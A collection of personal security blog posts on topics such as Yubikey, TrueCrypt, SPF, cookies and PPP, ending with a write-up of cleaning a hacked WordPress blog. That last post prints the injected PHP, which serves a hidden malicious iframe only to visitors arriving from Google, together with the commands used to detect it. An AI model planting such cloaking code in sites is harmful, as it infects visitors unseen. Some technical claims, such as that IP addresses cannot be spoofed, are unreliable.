On Securitynow podcast #141 Steve Gibson talks about his experience at RSA Conference 2008 a few weeks back. The RSA Conference is the largest of it’s kind in the world focusing on information security. I mentioned to a friend that I’m going to be at the RSA Conference in 2009 and I’m going to leave the kids somewhere and bring my wife. Ok, ok - that’s pushing it.Steve gave out a url which takes you to RSA conference Keynote speakers so you can watch at your leisure. There is one really fascinating keynote address by Jeff Hawkins about brains and computers (AI) that is worth watching.  Jeff Hawkins co-authored a book called, “About Intelligence”.

At RSA Steve stumbled on a really cool new product called the Yubikey from a Swedish company called Yubico. The Yubikey is a very small USB authentication device. You plug it in to your computer’s USB port and then go to, say, a website that was all set up to support Yubikey. Touch the device and it will spit out a really long one time password sequence. If you have the the device that is associated with you (based on the devices serial number I would guess) then you are authenticated. In authentication speak this form of authentication would be something you have, while your static password is something you know. The really cool thing about this device is that the Yubikey contains a tiny keyboard so you don’t have hardware compatibility issues. I need to learn more in order to fully explain how this works. What better way to learn about the product than to implement it. We talked about securing my blog’s “Admin panel” in a previous post. I have username/password and for a 2nd factor authentication I can use the yubikey. I sent the company an email the other day expressing my interest in the product. I got a response back from the CEO.

“Thanks for your interest in Yubico….Since Steve Gibson sent his latest SecurityNow! podcast interest in our product has greatly exceeded our expectations. We are working hard to catch up with demand and sincerely apologize to all of you who are still waiting to receive shipments from us. We expect to be caught up within the next two weeks. ……. “

I’m sure the CEO is happy she met Steve at RSA. I’ll keep you updated on my progress in implementing the Yubikey on my blog’s “admin panel”. We also need to discuss “openID” since the yubikey is openID compliant. In short you can use your Yubikey when logging onto sites that support openID for an added level of security. Until next time..

I’ve been reading and learning about web application security lately.  As a programmer with experience in web redevelopment, I thought web application security would be the perfect place for me to get my security fix.  I’m finding it very interesting.  I decided that a good place to start learning was with my blog application; how can I better lock down this blog.  My blog uses the very popular open-source blogging solution called Wordpress.  Recently I found a posting on Matt Cutt’s blog on some things you can do to secure your Wordpress blog.  Let’s discuss one his simple recommendations I implemented.The first thing I did was create a .hatches file in my “wp-admin” directory.
AuthName “Access Control”
AuthType Basic
order deny,allow deny from all
# whitelist home IP address
allow from 71.172.62.228 
The .htaccess files are also called “distributed configuration files” which allow you to restrict access to a particular resource in a web application.  If you have access to the main configuration files (usually httd.conf) on the server it is better to make theseconfiguration changes there, since modifying the .htaccess file may cause your application to take a performance hit. My blog is hosted in a shared environment and therefore, I don’t have access to the main configuration file.  My .htaccess file essentially blocks everyone (all IP’s) from accessing the www.itsecpackets.com/blog/wp-admin directory unless the TCP connection is made from the IP specified, which is my home IP address.  When I access the admin page as the admin, I will still need to enter my username/password.  This solution gives me another layer of security. Now keep in mind, with security comes a loss of convenience.  I will not be able to logon to my Wordpress admin panel from work (unless I add the IP address). The same applies if I’m at a friend’s house.   There are always trade-offs when it comes to security - always.

I’m a big Apple fan. There is big Apple news that I feel the need to share! Apple announced at their much publicized event on March 6th that they will be allowing developers to write programs for the iPhone and iTouch devices. The Software Development Kit or SDK is available to download from the Apple site. You will need a MAC running their new Leopard OS to write programs. People, this is really big!!! I was totally blown away watching the event the other evening. Apple invited 5 different companies spanning diverse industries, from games to medical software to present their programs at the event. The developers had 2 weeks to program something new for the event. Some had never written software on the MAC before. The companies themselves were quite surprised to see what they were able to accomplish in such short period of time. I think this move by Apple to invite third-party developers to program using the Apple SDK will propel the IPHONE into new dimensions. This is a huge accomplishment. It is simply a revolutionary device, a hand-held mobile computer that is always connected. In my opinion, Apple is reinventing the personal computer.

Apple will be the gatekeeper for all these programs. The only way you’ll be able to install these programs on your iPhone is through the “App Store” on iTunes which will be accessible using wireless, as well. Developers will name the price for the programs they write. Apple will take 30% off the top and the developer will get 70% of the set price. Apple will be hosting the application, distributing and marketing your application. Developers will need to adhere to Apple’s rules when writing programs. No porn, no malicious software, no illegal or privacy software will be allowed. It has yet to be seen whether Apple will allow applications that might compete with their own applications. If Amazon wants to create an MP3 download service, would Apple allow it to compete with their own WIFI iTunes store application? Or let’s say Sun wants to create a JVM to allow Java programmers to write code; will that be allowed? Lots of questions surface but we’ll have to wait until the end of June to see what happens.

So, being a developer, I absolutely had to download the SDK. I downloaded the “Hello World” sample application and opened up the source code in Xcode ( Apple’s IDE). With a click of a button I had the program running on the IPHONE simulator. I wish I had more time to play with this! As we speak, developers all over the world are writing programs. Bloomberg reported today that the SDK had 100,000 downloads of programs in less than a week. Another interesting point that Adam from the Maccast brought up is, what he calls, the halo effect for developers. He thinks that once developers start creating iPhone programs, they will love the experience and will, thus, want to start developing for MAC products.

Another very cool iPhone feature that is specifically geared to the gaming companies is the accelerometer. The accelerometer detects when the device is turned or moved and the display is viewed differently as directed by the movement. You may view pictures or video in landscape mode or look at a webpage in wide screen. Developers can take advantage and code for how the device is moved in the 3D space. This is particularly applicable to game developers. At the demo, I was blown away by the graphics/accelerometer use in the game called “Spore”, developed by EA and a monkey game by Sega. To control the game you move and tilt the iPhone; very cool stuff indeed

There is an interesting concept that surfaces sometimes in business, politics or espionage called “Plausible deniability”.  It involves the creation of chains of command that are loose enough to untie when the need arises.  If high ranking officials or politicians become aware of disreputable or questionable activities, they may claim, using “Plausible deniability”, that there is no  way of proving they had any knowledge of such activities.  They can simply deny it, and since there is no direct connection to these high ranking officials, there can be no hard evidence linking themselves to the questionable activity or to the knowledge thereof.  The Plausible deniability concept is also applicable in technology, as you”ll see.

There is this great open-source encryption  software that you can install for free called Truecrypt.  Since most people have bank statements or other sensitive files stored on their computers, this program is for everyone.   You can easily set up what they call an “encrypted volume”.  What is that?  It looks just like any of your letter drives on your computer, but it is really a container of all your encrypted documents.  You can drag your sensitive files right into this new drive and use it just like any other drive, ie: drive F: on your computer.  Truecrypt performs “on the fly” encryption which means that your file is encrypted and decrypted in memory as you use work with it.    When you are done updating a file, it is always written back to the volume encrypted so you never have to worry!

When you mount a Truecrypt volume you need to enter your password and when the computer shuts down down the volume is then unmounted.  If you look at the file that is used to mount these encrypted volumes you’ll see random bits of data.  There is absolutely no way to get any information about your data stored on the encrypted file; it’s just random noise.  To give you an idea of how safe your data is, Truecrypt writes on their website:

“The only way to recover your files is to try to “crack” the password or the key, but it could take thousands or millions of years depending on the length and quality of the password/keyfiles, on software/hardware efficiency, and other factors.”

These guys really covered everything, so it is a highly secure system.  Truecrypt volumes are extremely easy to set up and their website is a great resource for how to get started and learn more about how this technology works.

Back to Pluasible deniability.  Let’s say that I created an encrypted volume and put some very sensitive files in my encrypted container, all is good and my data is quite safe.  Now let’s suppose that some evil  person gains access to your  computer and forces you to give over your secret files he thinks you have.  He knows that you’re smart and that you must have encrypted your sensitive data.  You have no choice but to give him your password and he then can take your files!  To get around this scenario, Truecrypt allows you to create a hidden volume.  A hidden volume is an encrypted volume within another encrypted volume, each having different passwords.  Now, in the case of the evil person, you can say to him “here are my secret files” and give up the password to the outer volume.  The files you “gave” him in the outer volume are not really your sensitive files.  The inner volume contains the truly secret files.  When you open up the outer volume there is absolutely no way of knowing that there is a hidden volume inside.  You have successfully invoked “Plausible deniability” in the sense that your adversary does not know anything other than that outer volume exists and you do not “have” any secret files the adversary wants.  The direct link was severed and you can deny any knowledge of those files.

In a future post we”ll talk about whole disk encryption a new feature of truecrypt. This solution is perfect for laptops or even desktops that contain sensitve data.

Before we had the Apple’s OS X Tiger there was no way to do screen sharing across the Internet.  My grandfather, who lives in Michigan, had just bought a new  Mac.  I wasn’t going to fly out there but he desperately needed some help showing him how to use his Mac.  I, therefore, needed a way to control his computer remotely.  In most households there is a router with at least one, if not multiple computers, sharing the Internet connection.  This is, essentially, a network setup.  We can share printers, share files between computers, amongst other things. With my grandfather, what I really needed was to be on his network; this way I could easily connect to his computer with his IP address. Now you’re going to ask, why don’t you just get his IP address and connect over the Internet without being on his network?  Good question!  Remember, his IP address is not the IP address of his computer, it’s the IP address of his router.  The truth is it can be done, though we would need to configure his NAT router, punching some holes to allow certain traffic to flow through the router to his MAC.  This type of configuration is complex and besides, there is no way my grandfather is going to be able to do this.  What we need here is a VPN (Virtual Private Network) and Hamachi is just the solution, plus it’s free!

A VPN is a network that uses the public infrastructure, such as the Internet to provide users with secure access to their organization’s network.  Very often you will find corporate VPN’s. What that means is an employee who is out on the road or working from home and needs access to the corporate network, is able to gain access via the corporate VPN and thus, work off-site.  Since the VPN’s operate over the Internet, an insecure medium, there is a real need for bullet proof security using extremely robust encryption protocols. 

I downloaded and installed HamachiX for the MAC.  I was able to easily set up a network then I gave the network a name and a password.  Now that I have a VPN setup on my end,  I had my grandfather install HamachiX on his MAC.   He joined the network I created by using the name I gave it and the password.  I was then able to see him logged in.  I then had him configure his MAC to run the remote desktop service and also have his firewall accept the VNC client connection.  VNC is remote control software which allows you to view and fully interact with a computer desktop.  I fired it up on my MAC.  I make the connection using the IP address that Hamachi gave my grandfather’s computer and the port the service was running on; voila! His screen appears in the window.  I am now able to control his computer.  Hamachi is “zero configuration”, meaning I did not have to re-configure my grandfather’s router.  It was like his computer was in my house on my network.  I was able to telnet to his computer and I could even set up to print to his printer in Michigan if I wanted to. 

 If you’re in a hotel away from home using the hotel’s insecure wireless, Hamachi would be a great solution to securely connect to your home computer and access files, or even browse the net off your home computer.  It’s really an intelligent solution for the small business or home user who needs to access computers across the net in a secure mode.

There is a very neat open standard that is helping solve the ubiquitous SPAM issue. If you have an email account you must know what SPAM is. SPF stands for “Sender Policy Framework” and is an extension to the SMTP standard. We need to understand SMTP before we delve into SPF.Most Internet technologies are based on the concept of a client/server relationship. Sending email is no different. When you browse on the Internet you have a browser (client) and the web-server (server) that serves you the page. With email you usually have an email client that is configured to talk to an SMTP server for sending email. For receiving email your client can talk to a POP3 server or an IMAP server. When you compose an email there must be at least one recipient. Let’s say you have an account with Verizon (your ISP) and you are sending email to a Gmail recipient. You write your email and click “send” and the email is sent to Verizon’s SMTP server, the server that handles all outgoing email. The SMTP server then looks at the recipient and sees that the domain (after the @ ) is intended for someone over at Gmail. It then makes a DNS request to find the IP associated with it’s counterpart over at GMAIL, which is Gmail’s SMTP server. Verizon SMTP server sends the email off to Gmail’s SMTP server. Gmail’s SMTP server will then see that the recipient has a Gmail account and it will drop the email into that person’s mailbox. Now, if you open up an email and look at the headers, there will be a series of “received” headers that will show you the path that the email took. This path looks like a stack, with the first one being the last destination. The “Received” header at the top is actually the last SMTP server that received the email and the bottom “received” header is the first SMTP server that received the email. Every SMTP server that receives that email will stamp a received header onto the email with the IP address of the client or server they received the email from. The received header information becomes essential for SPF, as you’ll see.

The difficult part with this approach is that the FROM address can be spoofed. So my address rongoodbin@veizon.net can be substituted with bill@microsoft.com easily. Nearly all SPAM is sent by fake people who hijack peoples’ real email address’. Spammers like to use addresses with domains that have credence on the Internet. You are more likely to read a piece of spam sent from john.goldstone@ibm.com than some other email like girly1234@aol.com. This type of thievery undermines the credibility of email, which is an unfortunate consequence, and like other Internet technologies security, it wasn’t even a thought at design time.

SPF was created to help remedy this problem and try to help restore the confidence in email integrity. We need some way to authenticate the sender’s email address and not just blindly accept what was supplied as the true sender. Here’s how it works. We talked earlier about the email hopping as it goes from one server to the next en-route to it’s destination. As it travels, the server will stamp the email with the IP address of where it came from. Say there is an email sent to someuser@gmail.com from someone claiming to be rongoodbin@verizon.net. Now, if Gmail is configured to operate with SPF, Gmail will then make a DNS request for the SPF record that verizon.net has configured and stored. This SPF record from Verizon tells Gmail what the IP range this email should be coming from. Gmail then checks the IP address from the received header on the email. Remember, an IP address can’t be spoofed, as we saw with my
question on security now post. If the IP address checks out ok - meaning that it’s in the range allowed by the SPF record, then we know this email was actually sent by Verizon’s SMTP server and not someone from a different SMTP server out in Russia sending mail on behalf of a verizon.net user. Now this valid email will be forwarded to the recipient’s mailbox. If it turns out to be invalid, then the email is discarded. SPF, along with other technologies, is definitely a step in the right direction in the constant fight against SPAM.

The CIA triad is a very fundamental and important security model in Information Security. There are three key (triad) principles that every organization should subscribe to. If any of these key areas of security can be breached, there is a serious flaw in the policies and practices of the organization.Confidentiality ensures that private information is accessed by only those that have the appropriate authorization to do so. Encrypting data is an example of this principle of ensuring confidentiality. We saw an application of confidentiality in my post on the ‘Java Hashing Class’. When we entrust our private data to an organization it is absolutely essential that this information is kept just that - private. A company can easily go out of business if a breach in users’ private data is leaked.Integrity is about data consistency. Organizations need to be certain that their data is not being modified in any way by unauthorized or even authorized people or processes. If a bank employee decided to access your savings account and pull one zero off your balance, you wouldn’t be too happy. Data must also be consistent while in storage and also in transit.Availability is the concept that a resource is available to you when you want to access it. My online banking site needs to be accessible when I want to use it, even if that means accessing it at 2:00 am on a Sunday. Most websites that serve a business or public need must adhere to this principle of the triad or else they would simply go out of business. Ebay, for example, would be seriously hurt if their site was inaccessible for even a short time. A DOS (Denial of Service ) attack is when a website is flooded with too many requests in a very short period of time that the site crashes from the load. The attacker is not trying to gain access, their goal is to make the site unavailable to it’s users.All of these security principles are important to every organization. However, each organization needs to understand their business and may stress more importance on one of the principles over another.

Since most people love cookies, I thought I’d explore the web cookie topic. Some people have the misconception that cookies can do nefarious things to your computer like copy your files, reveal your identity or damage your computer in some way. As a web user you should understand what cookies do and some of the privacy concerns they raise. With this knowledge I hope you can make an informed decision on what kinds of cookies you allow or block at the browser level, based on your comfort level.

Let’s say you open your browser and go to ‘http://www.amazon.com/‘. You’re visiting the site using a browser and acting as the client, while Amazon.com, running a web server is the server side. Webserver handles HTTP requests. HTTP is a stateless protocol, meaning, when I go to a page at Amazon, the Webserver sends the page to my browser and I see it. When I click on a book that I like, a new request is sent to the Webserver and a new new page is sent back to my browser. The Webserver has no knowledge of the previous page I clicked. They are like humans with no memory, constantly meeting new people. Now you’re going to ask, “What do you mean that Amazon.com is stateless when it shows my name when I visit and it seems to know what books I like?”. Good question. This is where cookies come into play. Cookies allow a webserver to interact with a client in a stateful fashion. A cookie is a parcel of text that is sent to the server with each request which allows the server to remember the client. There are different types of cookies used on the internet; persistent cookies and session cookies (or transient cookies). Each of these types of cookies can be turned on or off in the browser settings. A session cookie allows the webserver to know who you are as you move from page to page. Session cookies store information in the browser memory, which is available for the duration of the browser session. This information is only available as long as your browser remains open. If you close your browser, the session cookie information is gone. It’s called a session cookie for the reason that this type of cookie has a short life. For example, your bank’s site will establish a session cookie after you log on that is valid as long as you are interacting with the bank site. However, if you walk away from your computer for a snack, chances are your session will be invalid so that when you try to click on your checking activity, you’ll be prompted to login again. This ensures against someone walking over to your computer and viewing your private financial data.

A neat little trick to view your session cookie details is the following: Go to a site like ‘amazon.com’ or your bank site (really most sites establish a session cookie to know you as you move around). When you’re on that site, copy and paste javascript:alert(document.cookie)’ into your browser. You’ll see a bunch of name/value pairs. One of them is the SID or session-id, which is the ID that tells the webserver who is making the request. Very cool indeed.

The other type of cookie is called a ‘persistent cookie’. This cookie is actually stored on your computer in a little file with information that is used by the webserver to idenify you. When you return to a site that already has a cookie stored on your computer, the browser automatically passes on the cookie with the request. The webserver now has some identifying data. Now if you visit a site and see that your userid is already populated or if you go to, say, amazon.com and it says, “Welcome back Ron”, the persistent cookie makes this possible. If website A stores a cookie on your computer, website B can’t access the cookie. However, even if a website somehow was able to access a cookie from another site the information in the cookie would not make sense. Only the issuing website would be able to make sense of the data stored in the cookie. Another application of a ‘persistent cookie’ is that it can store information about you that will help the website create a page that was customized by you. The cookie files are stored in /Windows/cookies or in /Windows/profiles/username/cookies directories, where username is replaced with the user’s login name. If your operating system directory is not named Windows (such as Winnt for Windows NT) then look in that directory instead of the Windows directory. If you like, you can delete all of them or delete them for sites you don’t want to be storing cookies.

So what’s the bottom line? Are cookies dangerous in any way? Should I block cookies from being set? The truth is that cookies aren’t dangerous and cannot do anything detremental to your computer. Cookies can’t get any more information about you than what you give the website issuing the cookie. Also, cookies are not able to aid the webserver to read files on your computer.

A good practice that users employ is to browse the internet with cookies turned off by default. Once you visit a site and decide to trust that site, you can then proceed to add the site and allow your browser to accept cookies from this site. You can also view the site’s privacy policies to make sure that you’re comfortable with their policies.

In a future post I will talk about third-party cookies. These cookies raise privacy concerns, since they allow ad companies to track the different types of site you visit and then tailor their ads based on the data collected.

Steve Gibson of “GRC.com” has successfully implemented a very cool and extremely robust multi-factor authentication for his GRC employees who need access to an web admin console. He shares his implementation on a series of pod-casts found here. The cool thing about this form of authentication is that he assumes “perfect knowledge”. This means that Steve’s one-time password scheme is extremely secure. So secure, in fact, that if a keystroke logger residing on that machine is recording the keystrokes while a user attempts to log in - that information would not aid an in future attempts to log in. Most sites you visit that contain the typical user log-in, including your online banking site, would be vulnerable to a key stroke logger attack. That is because they require a password that is static. This means the password doesn’t change each time a user logs on. A key stroke logger would be able to identify your password as you type on the keyboard. Armed with this knowledge of your password the attacker can masquerade as you in a future log-on attempt. Another term for this attack vector is called a “replay attack”.In the Steve’s “PPP system” the four-character password, which is a passcode, is different each time the user logs on. There are 16,777,216 possible combinations for each passcode and since no passcode is ever reused, a replay attack would be impossible. The passwords are displayed on a credit card sized piece of paper that can be easily stored in one’s wallet. Steve uses some heavy duty encryption with a highly pseudo random 256 bit key to generate these series of passcodes. Each user will have a 256 bit key that will define the series. This key is stored on the server and the user doesn’t know this key. Another nice feature with this system is that the server will keep track of the passcodes of prior logons, and prompt the user for which passcode that it wants the user to enter. Each column is a letter and each row is a number, therefore the server might show “3E [1]:” so you would type in 5th column 3rd row on the first page. You can also print out your own passcode sheets and if you ever lose a sheet you can tell the server to forward you on to the next sheet, invalidating
the prior passcodes.

The PPP system was well received in the security community and some very practical open-source implementations were created. I downloaded and installed the PPP for PAM module, which allowed me to use PPP when I remote log-on to my MAC using SSH. Interestingly, Steve mentioned that when his employees log on using PPP they also supply a static password in addition to the PPP password. The reason behind this is that if the sheet of passcodes (something you have) got into the wrong hands they would be able to log in as you. However, they still need the static password that only you know, to log on.

A friend up mine, Shimon Sandler, has a website that got hacked. He turned to me for help. Shimon runs a popular blog on SEO (Search Engine Optimization). When you do a search in Google for “Shimon Sandler” he is always number one (he’s very good at what he does). A few weeks back Shimon’s site got “blacklisted”, which means that when you clicked on the link to his site a message popped on your screen. It said, “Warning: visiting this site may harm your computer”. With the help of Matt Cutts from Google we discovered the “mal-ware”! This malicious software reared it’s ugly head ONLY if the page prior (Referrer) was any page from Google. The “curl” command came in handy in this case. You certainly never want to click on a suspicious link. Curl is a command that allows you to download a URL so that you can view it in text editor rather than requesting it in a browser.

1. Fetch the page with a Google referrer:
curl -H ‘Referer: http://www.google.com/search?hl=en&q=rbn’
http://www.shimonsandler.com/ > /tmp/1

2. Fetch the page with no referrer:
curl http://www.shimonsandler.com/ > /tmp/2

3. Compare the two pages:
diff -u /tmp/2 /tmp/1

The cloaking/malware is included via this line:
<iframe src=”http://302found.net/in.cgi?20″ mce_src=”http://302found.net/in.cgi?20″ style=”display:none;”></iframe>

As you can see, I requested two pages. One was just straight www.shimonsandler.com with no Referrer page and the other was www.shimonsandler.com with a Google Referrer in there. The one with the Google Referrer shows an iframe with a suspicious link! That is the “mal-ware”.

I then logged onto Shimon’s web-server and found the server code responsible for displaying this iframe link.

Here is the command I used to find which script file contained “302found”.
find . -exec grep 302found {} dev/null \;

Here we are:
./wp-content/themes/SS-shimon_sandler/sidebar.php:>? $rf = $_SERVER[’HTTP_REFERER’]; $se = “google”; if (preg_match(”/$se/”,$rf)) { echo ‘<iframe src=”http://302found.net/in.cgi?20″ mce_src=”http://302found.net/in.cgi?20″ style=”display:none;”></iframe>’;} ?>

You can see the code is doing a check on the REFERRER, and if the URL contains “Google” then it writes out to the HTML this nasty iframe which is set so noone could see it on the page.

Soon after I took out that code in the PHP file, Shimon’s site was once again white-listed.

Here is a great link I found with details on what to do if your site gets hacked. Even if your site was never hacked it’s worth it spend the time to review some basic suggestions on how to properly secure your site. Remember, as with all passwords, make sure its a strong password. Any password that is just a word, like ‘pumpkin’ or ‘dandelions’ is extremely weak. I can’t say exactly how Shimon’s site got hacked, although if you follow some good security principals, it will better protect you and possibly, prevent an attack like this.